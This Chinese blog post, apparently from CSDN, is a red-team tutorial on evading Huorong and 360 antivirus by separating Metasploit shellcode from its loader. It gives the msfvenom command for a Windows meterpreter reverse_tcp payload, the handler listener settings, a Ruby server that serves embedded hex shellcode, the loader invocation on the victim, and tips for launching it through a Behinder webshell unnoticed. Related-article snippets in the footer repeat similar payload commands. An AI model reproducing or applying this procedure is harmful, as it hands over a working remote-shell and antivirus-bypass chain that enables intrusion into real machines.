msf shellcode分离免杀技术

已于 2022-05-28 16:59:24 修改
阅读量1.8k 收藏 8
点赞数 2
文章标签: shellcode分离免杀 红队免杀
于 2022-05-27 18:12:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44159028/article/details/125008482
版权

目录

实验

实战演练

一般的shellcode是直接放在程序里面执行,分离免杀是将恶意代码放置在程序本身之外的一种加载方式。本实验轻松绕过最新版火rong和360

实验

实验环境

  • 受害机:win7(192.168.111.135)安装了最新版火绒360
  • 攻击机:kali  (192.168.111.132)

最新版火绒和360

1. ⾸先kali使⽤MSF⽣成⼀个shellcode,混淆后的:LPORT只能⽤53

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=53 -b '\x00' -f c |grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"

生成如下shellcode代码

2. kali开启监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.111.132
set lport 53
#持续监听
set ExitOnSession false   
exploit -j

3. 使用shellcode.rb

shellcode.rb内容如下,将msf生成的shellcode替换掉client.write中的值

require 'socket'
if ARGV.empty?
	puts "Usage:"
	puts "Micropoor.rb port"
	exit
end

PORT = ARGV.first.to_i

def handle_connection(client)
	puts "Payload is on-line #{client}"

	client.write("bba5835fcbdbd0d97424f45a29c9b159315a14035a1483eafc4776a32308795cb476f3b985a467c9b478e39f34f3a10bce716e3b673f4872788e54d8ba912823ef7110ece27055ba899d0b6af933bc1fbf8fbdcfcbafc56a0b5b7a745c28ca6ed776eb8f34d66e46ceea3968d0998e012f4bdfd5f1bc2d7af085166286fd641f91c617fb14d8b0888f3c405c49b74e291d9f52acf2946f25f57ae67dd25ea2267bc70e888417f675215c1563559de58c0b092941b4c925d2c7fbea4840b7635797ce64684768e49668882c5d3cd846743db39679e8299dedd305ce69bb57117209def72221b0a7829170186bf87f478b03aae026ec0258df950f127e599a5e40d12e9e0f125b8c7845a34c79e0a3267da2f4de7f9332417ff641867f8773fcb61d3b6ab7f1bb6ae19bbb0255f8e8379ad59deb0fd6f75887bef587ef6006e27366f8705ccf908adcef60e1dcbf08fef330f8ffd918908a8feb018a85aa9f8b2a7710f14388d1064aedd2067213efd04b612ee1ef7a0544591165da9930")
	client.close
end

socket = TCPServer.new('0.0.0.0', PORT)
puts "Listening on #{PORT}. "

while client = socket.accept
	Thread.new { handle_connection(client)}
end

4. kali运行shellcode.rb

运行此,是为了能让外网下载到shellcode,端口随便

ruby shellcode.rb 8080

5. 受害机器win7运行shellcode加载器远程加载shellcode并上线msf

shellcode_x86.exe可以到github上下载(该工具为shellcode加载器,不会被杀)

shellcode_x86.exe rb的端⼝ MSF-IP 
shellcode_x86.exe 8080 192.168.111.132

shellcode加载器远程加载shellcode,此时火绒和360无任何反应。运行此shellcode的窗口得一直保持这样,如果我们关了该窗口则会掉线

 msf成功上线

总结

msf生成混淆shellcode,rb开启监听,目标远程加载shellcode,msf上线

实战演练

假设win7上面开启了一个web服务器,通过此web服务我们拿到了一个冰蝎的webshell(杀软不会杀webshell),然后我们可以上传任意恶意的文件上去,如果没有运行则杀软不会拦截。并上传shellcode.exe上去

1. 当我在 "命令执行" 中执行shellcode的时候,此时360会拦截,不知道为啥

2. 当我在 虚拟终端执行时,则没有被拦击

但此时win7中直接弹出了一个shellcode窗口,怪吓人的!也成功上线了

总结:如果是用冰蝎上传webshell则需要在虚拟终端中启动shellcode才不会被杀,但是启动会有窗口,容易被发现

~Echo
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
MSF技术总结
05-07
metasploit framework 常用命令说明和使用,及其他高级用法的使用总结
Payload分离免杀绕过杀软
干铮的博客
10-14 2960
Payload分离免杀绕过杀软 杀毒软件的原理是根据特征、行为、基于云查杀,云查杀主要是根据特征码进行查杀,每一种杀毒软件都会检测头文件,所以可以进行程序段代码分离的形式,绕过当前主流杀软。 1.C语言编译后门 root@iZ2ze0r5hel5o5dt2w9uluZ:~# msfvenom -a x86 --platform Windows \ > -p windows/meterpreter/reverse_tcp \ > -b '\x00\x0b' LHOST=123.56.138
通过Python实现Payload分离免杀过程详解
09-16
主要介绍了通过Python实现Payload分离免杀过程详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
shellcode加载器
10-02
22年9月最新,采用shellcode加密分离加载,支持msf和cs
python反序列化-分离免杀1
08-03
免杀技术可以有很多种,如修改特征码,花指令,加壳,次编译,分离免杀,资源修改,在制作免杀的过程中往往需要结合使。python反序列化-分离免杀远程加载 shel
Shellcode分离加载实现免杀的两种方式(VT免杀率:1/68)
xf555er的博客
05-24 2617
本文详细介绍了如何通过文件加载和远程URL加载方式实现Shellcode分离加载,以规避安全软件的检测。文章首先描述了通过Metasploit Framework生成的shellcode文件加载的过程,并提供了相关的C++代码。为了避免被杀毒软件检测,利用动态API调用和lazy_importer项目进行代码优化。其次,文章讨论了如何通过远程URL加载shellcode,也提供了相应的实现代码。
免杀分离免杀(python)
zhangshuaiijie的博客
06-28 635
shellcode是一段用于利用软件漏洞的有效负载代码,以其经常让攻击者获得shell而得名shellcode loader加载器是用来运行shellcode的加载器,用什么语言来写都可以思路就是将shellcode和loader分离开来,用loader加载存在于普通文件中的shellcode
简单的Msf木马免杀
weixin_47948655的博客
08-12 888
简单加密shellcode与加载器实现msf木马免杀
Shellcode免杀对抗(C/C++)
最新发布
qq_74806534的博客
02-17 2万+
这里便是杀毒软件杀毒的原理,这就是特征,我们只需要将木马程序进行简单的分析,就能得到shell回连的IP地址和端口,如果杀毒软件发现我们的可执行文件是一个木马程序。加载器的作用:由于shellcode是一段可以执行的二进制代码,因此需要开辟出一段可以读写可操作的地址来运行shellcode,而这就是加载器的作用。之后打开.c文件是一个未编译代码,放到上文的编译代码中,注意这里是x64编译,用的方式三,使用.c文件。因为我们的加载器的特征,各平台杀毒软件都有了已经,所有我们就要用新的,特征没有被锁定。
关于如何使用shellter以及shielden对于正常软件的双重加壳,过火绒和360
07-16
本资源是本人自己学习msf是针对于加壳入侵而特地学习和总结,为了和同工作室进行分享而编辑的ppt,如果有兄弟需要软件以及更加详细的操作的可以私信我,当然我是一个刚刚入门的新手,如果有错误的地方可以告诉我,共同进步,谢谢大家!
第六十六课:借助aspx对payload进行分离免杀1
08-03
靶机背景:msf exploit(multi/handler) > set lhost 192.168.1.5msf exploit(multi/handler
rasp java tomcat_webshell中的分离免杀实践
weixin_28719385的博客
02-27 361
声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。描述前段时间看了倾旋的分离免杀直播,感觉像打开了免杀新世界的大门,jsp 中使用...
认识分离免杀
weixin_50217210的博客
10-16 80
WinHttpOpenRequest //通过hconnect句柄创建一个hRequest句柄,用于发送数据与读取从服务器返回的数据。WinHttpReceiveResponse //发送请求成功则准备接收服务器的response。WinHttpConnect //通过上述句柄连接到服务器,需要指定服务器ip和端口号。两种思路:一是从socket连接加载,客户端连接c2端口,返回shellcode。WinHttpOpen //初始化一个winhttp-session句柄,c++文件流多复习复习。
CobaltStrike木马免杀代码篇之python反序列化分离免杀(一)
xf555er的博客
11-21 1710
本篇文章主要用到python来对CobaltStrike生成的Shellcode进行分离免杀处理, 因此要求读者要有一定的python基础, 下面我会介绍pyhon反序列化免杀所需用到的相关函数和库
免杀对抗-无文件落地&分离拆分-文本提取+加载器分离+参数协议化+图片隐写
xiaoheizi的博客
09-24 1168
无文件落地&分离拆分其实就是内存免杀,内存免杀是将shellcode直接加载进内存,由于没有文件落地,因此可以绕过文件扫描策略的查杀。为了使内存免杀的效果更好,在申请内存时一般采用渐进式申请一块可读写内存,在运行时改为可执行,在执行的时候遵循分离免杀的思想。分离免杀包含对特征和行为的分离两个维度,把shellcode从放在程序转移到加载进内存,把整块的shellcode通过分块传输的方法上传然后再拼接,这些体现了基本的”分离“思想。3.因为实战的时候不需要加密,所以就代码中的加密代码剔除,减少特征。
免杀马学习(分离免杀)
红队是青春
02-19 301
免杀马之分离免杀学习
msf生成shellcode
06-28
### 回答1: MSF生成shellcode是一种常见的渗透测试技术,可以用于获取目标系统的控制权。使用MSF生成shellcode需要掌握一定的技术知识和经验,包括了解目标系统的漏洞、了解不同类型的shellcode以及使用MSF生成工具等。通过合理使用MSF生成shellcode,可以有效提高渗透测试的效率和成功率。 ### 回答2: MSF(Metasploit Framework)是一个广泛使用的渗透测试工具,常用于开发和测试网络安全漏洞。它的一个特色是可以自动生成各种Payload,包括各种平台的ShellcodeShellcode是一种十六进制编码的机器语言代码,它通常被黑客和渗透测试人员用于攻击目标计算机系统。通过使用MSF Framework,我们可以生成各种类型的Shellcode,这些Shellcode可以按照我们自己的需要进行定制。 在MSF Framework中,我们可以使用msfvenom工具生成Shellcode,该工具是一个十分强大的Payload 生成器,使用起来非常简单。首先,我们要指定Payload的类型,比如说是Windows还是Linux,以及处理器架构和操作系统版本。 生成Windows平台的Shellcode,我们可以使用下面这条命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f hex -o shellcode.txt 其中,“-p”指定Payload,这里我们使用的是windows/meterpreter/reverse_tcp,它可以反向连接我们指定的IP地址和端口。LHOST是我们的IP地址,LPORT是监听的端口。然后我们指定输出格式是hex,将其输出到shellcode.txt文件中。 生成Linux平台的Shellcode也很简单,我们可以使用下面这条命令: msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f hex -o shellcode.txt 这里我们使用的是linux/x86/shell/reverse_tcp Payload,它也可以反向连接指定的IP地址和端口。 总的来说,生成Shellcode是非常重要的黑客工作,使用MSF Framework的msfvenom工具可以帮我们快速生成各种类型的Shellcode,而且十分方便实用。但是需要注意的是,使用Shellcode进行攻击可能会违法,所以使用前要自觉遵守相关法律规定。 ### 回答3: MSF是Metasploit框架的简称,它是一种广泛使用的网络攻击工具。MSF有许多功能,其中一个基本功能就是生成shellcodeShellcode是位于程序中的二进制代码,其目的是执行特定的操作,比如弹出一个命令行窗口来执行攻击者命令等等。在网络攻击中,shellcode往往是黑客的“最后一击”,用来穿过目标系统的防御措施,从而实现控制盗窃信息或实施其他恶意行为。 MSF生成shellcode的步骤如下: 1. 打开MSF控制台,使用"msfvenom"命令来生成shellcode。我们可以使用如下命令来进行生成: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP address> LPORT=<attacker port number> -f <output file format> -o <output file location> 其中,“-p"参数代表payload(负载,即要注入目标系统的代码),windows/meterpreter/reverse_tcp是要注入的代码类型;"LHOST"参数代表攻击者的IP地址,"LPORT"参数代表攻击者的端口号;"-f"参数代表输出文件的格式;"-o"参数代表输出文件的位置。 2. 运行该命令后,MSF会生成自定义的shellcode,其格式为二进制代码。我们可以将其保存在本地,以备后续使用。 3. 将shellcode注入到目标系统中。可以使用一些漏洞利用工具,如MSF框架,或在攻击者手动操作目标系统时,利用目标服务器上已知漏洞的服务向该服务器注入shellcode。一旦该shellcode开始运行,攻击者就可以进入目标服务器并获取所需的信息。 需要注意的是,生成shellcode需要有一定的网络安全知识以及操作系统相关知识。同时,使用MSF框架及其相关工具进行攻击是非法行为,一定要遵守法律规定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

~Echo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值